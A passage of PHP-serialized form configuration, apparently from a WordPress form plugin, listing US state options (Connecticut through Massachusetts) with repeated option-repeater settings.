nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 